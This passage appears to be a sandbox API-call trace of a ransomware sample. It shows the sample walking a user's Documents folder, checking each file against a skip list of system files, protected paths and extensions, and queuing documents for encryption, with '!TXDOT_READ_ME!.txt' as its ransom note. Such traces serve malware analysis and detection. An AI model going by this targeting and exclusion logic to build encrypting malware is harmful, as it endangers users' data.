psz2="ut8OaMa5zK99bj4EvRQ.csv", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv") returned="C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv" [0074.390] PathFindExtensionW (pszPath="ut8OaMa5zK99bj4EvRQ.csv") returned=".csv" [0074.390] StrCmpW (psz1=".csv", psz2=".txd0t") returned -1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="bootsect.bak") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="iconcache.db") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="thumbs.db") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2=" ransomware ") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2=" ransom ") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="debug.txt") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="boot.ini") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="desktop.ini") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="autorun.inf") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="ntuser.dat") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="ntldr") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="ntdetect.com") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="bootfont.bin") returned 1 [0074.390] StrCmpIW (psz1="ut8OaMa5zK99bj4EvRQ.csv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.390] PathFindExtensionW (pszPath="ut8OaMa5zK99bj4EvRQ.csv") returned=".csv" [0074.390] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".csv") returned 0x0 [0074.390] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.390] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.390] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0074.390] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.390] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv" [0074.391] SetEvent (hEvent=0x410) returned 1 [0074.391] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcea6c390, ftCreationTime.dwHighDateTime=0x1d5ed80, ftLastAccessTime.dwLowDateTime=0x860206d0, ftLastAccessTime.dwHighDateTime=0x1d5e43f, ftLastWriteTime.dwLowDateTime=0x860206d0, ftLastWriteTime.dwHighDateTime=0x1d5e43f, nFileSizeHigh=0x0, nFileSizeLow=0x3145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yvlM_ciBT0jsrUW.pptx", cAlternateFileName="YVLM_C~1.PPT")) returned 1 [0074.391] StrCmpW (psz1="yvlM_ciBT0jsrUW.pptx", psz2=".") returned 1 [0074.391] StrCmpW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="..") returned 1 [0074.391] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.391] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.391] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="yvlM_ciBT0jsrUW.pptx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx") returned="C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx" [0074.391] PathFindExtensionW (pszPath="yvlM_ciBT0jsrUW.pptx") returned=".pptx" [0074.391] StrCmpW (psz1=".pptx", psz2=".txd0t") returned -1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="bootsect.bak") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="iconcache.db") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="thumbs.db") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2=" ransomware ") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2=" ransom ") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="debug.txt") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="boot.ini") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="desktop.ini") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="autorun.inf") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="ntuser.dat") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="ntldr") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="ntdetect.com") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="bootfont.bin") returned 1 [0074.391] StrCmpIW (psz1="yvlM_ciBT0jsrUW.pptx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.391] PathFindExtensionW (pszPath="yvlM_ciBT0jsrUW.pptx") returned=".pptx" [0074.391] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pptx") returned 0x0 [0074.391] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.391] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.391] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0074.411] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.411] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx" [0074.411] SetEvent (hEvent=0x408) returned 1 [0074.411] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x5dcdc200, ftLastAccessTime.dwHighDateTime=0x1d5e406, ftLastWriteTime.dwLowDateTime=0x5dcdc200, ftLastWriteTime.dwHighDateTime=0x1d5e406, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5Oif6_Mr_Ui", cAlternateFileName="Z5OIF6~1")) returned 1 [0074.411] StrCmpW (psz1="Z5Oif6_Mr_Ui", psz2=".") returned 1 [0074.411] StrCmpW (psz1="Z5Oif6_Mr_Ui", psz2="..") returned 1 [0074.411] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.411] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.411] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Z5Oif6_Mr_Ui", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0074.411] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\system32\\") returned 0x0 [0074.411] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.411] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\system\\") returned 0x0 [0074.411] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.411] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\local\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\boot\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\perflogs\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\programdata\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\drivers\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\wsus\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="crypt_detect") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="cryptolocker") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="ransomware") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\WINDOWS") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.412] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\Program Files") returned 0x0 [0074.412] GetProcessHeap () returned 0xe30000 [0074.412] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ce) returned 0xed31f0 [0074.412] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0074.412] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\*", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*" [0074.412] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x5dcdc200, ftLastAccessTime.dwHighDateTime=0x1d5e406, ftLastWriteTime.dwLowDateTime=0x5dcdc200, ftLastWriteTime.dwHighDateTime=0x1d5e406, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0074.412] StrCmpW (psz1=".", psz2=".") returned 0 [0074.412] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x5dcdc200, ftLastAccessTime.dwHighDateTime=0x1d5e406, ftLastWriteTime.dwLowDateTime=0x5dcdc200, ftLastWriteTime.dwHighDateTime=0x1d5e406, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.412] StrCmpW (psz1="..", psz2=".") returned 1 [0074.412] StrCmpW (psz1="..", psz2="..") returned 0 [0074.413] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f62f110, ftCreationTime.dwHighDateTime=0x1d5e689, ftLastAccessTime.dwLowDateTime=0xee412150, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0xee412150, ftLastWriteTime.dwHighDateTime=0x1d5e475, nFileSizeHigh=0x0, nFileSizeLow=0x161c1, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="2o _xfnucm3wfE92We.ods", cAlternateFileName="2O_XFN~1.ODS")) returned 1 [0074.413] StrCmpW (psz1="2o _xfnucm3wfE92We.ods", psz2=".") returned 1 [0074.413] StrCmpW (psz1="2o _xfnucm3wfE92We.ods", psz2="..") returned 1 [0074.413] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0074.413] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0074.413] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="2o _xfnucm3wfE92We.ods", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods" [0074.413] PathFindExtensionW (pszPath="2o _xfnucm3wfE92We.ods") returned=".ods" [0074.413] StrCmpW (psz1=".ods", psz2=".txd0t") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="bootsect.bak") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="iconcache.db") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="thumbs.db") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2=" ransomware ") returned 1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2=" ransom ") returned 1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="debug.txt") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="boot.ini") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="desktop.ini") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="autorun.inf") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="ntuser.dat") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="ntldr") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="ntdetect.com") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="bootfont.bin") returned -1 [0074.413] StrCmpIW (psz1="2o _xfnucm3wfE92We.ods", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.413] PathFindExtensionW (pszPath="2o _xfnucm3wfE92We.ods") returned=".ods" [0074.413] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ods") returned 0x0 [0074.413] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.413] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.413] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.567] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.567] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods" [0074.567] SetEvent (hEvent=0x418) returned 1 [0074.567] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48075b0, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xa970ba70, ftLastAccessTime.dwHighDateTime=0x1d5e19d, ftLastWriteTime.dwLowDateTime=0xa970ba70, ftLastWriteTime.dwHighDateTime=0x1d5e19d, nFileSizeHigh=0x0, nFileSizeLow=0x17672, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="cpdJYzaQxXso.odt", cAlternateFileName="CPDJYZ~1.ODT")) returned 1 [0074.567] StrCmpW (psz1="cpdJYzaQxXso.odt", psz2=".") returned 1 [0074.567] StrCmpW (psz1="cpdJYzaQxXso.odt", psz2="..") returned 1 [0074.567] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0074.567] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0074.567] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="cpdJYzaQxXso.odt", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt" [0074.567] PathFindExtensionW (pszPath="cpdJYzaQxXso.odt") returned=".odt" [0074.567] StrCmpW (psz1=".odt", psz2=".txd0t") returned -1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="bootsect.bak") returned 1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="iconcache.db") returned -1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="thumbs.db") returned -1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2=" ransomware ") returned 1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2=" ransom ") returned 1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="debug.txt") returned -1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="boot.ini") returned 1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="desktop.ini") returned -1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="autorun.inf") returned 1 [0074.567] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="ntuser.dat") returned -1 [0074.568] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="ntldr") returned -1 [0074.568] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="ntdetect.com") returned -1 [0074.568] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="bootfont.bin") returned 1 [0074.568] StrCmpIW (psz1="cpdJYzaQxXso.odt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.568] PathFindExtensionW (pszPath="cpdJYzaQxXso.odt") returned=".odt" [0074.568] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odt") returned 0x0 [0074.568] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.568] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.568] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.591] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.591] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt" [0074.591] SetEvent (hEvent=0x418) returned 1 [0074.591] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e69320, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0xa1e87b90, ftLastAccessTime.dwHighDateTime=0x1d5ec0f, ftLastWriteTime.dwLowDateTime=0xa1e87b90, ftLastWriteTime.dwHighDateTime=0x1d5ec0f, nFileSizeHigh=0x0, nFileSizeLow=0xbffa, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="ivPZqJfxmHT.pps", cAlternateFileName="IVPZQJ~1.PPS")) returned 1 [0074.591] StrCmpW (psz1="ivPZqJfxmHT.pps", psz2=".") returned 1 [0074.591] StrCmpW (psz1="ivPZqJfxmHT.pps", psz2="..") returned 1 [0074.591] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0074.591] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0074.592] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="ivPZqJfxmHT.pps", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps" [0074.592] PathFindExtensionW (pszPath="ivPZqJfxmHT.pps") returned=".pps" [0074.592] StrCmpW (psz1=".pps", psz2=".txd0t") returned -1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="bootsect.bak") returned 1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="iconcache.db") returned 1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="thumbs.db") returned -1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2=" ransomware ") returned 1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2=" ransom ") returned 1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="debug.txt") returned 1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="boot.ini") returned 1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="desktop.ini") returned 1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="autorun.inf") returned 1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="ntuser.dat") returned -1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="ntldr") returned -1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="ntdetect.com") returned -1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="bootfont.bin") returned 1 [0074.592] StrCmpIW (psz1="ivPZqJfxmHT.pps", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.592] PathFindExtensionW (pszPath="ivPZqJfxmHT.pps") returned=".pps" [0074.592] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pps") returned 0x0 [0074.592] FileTimeToSystemTime 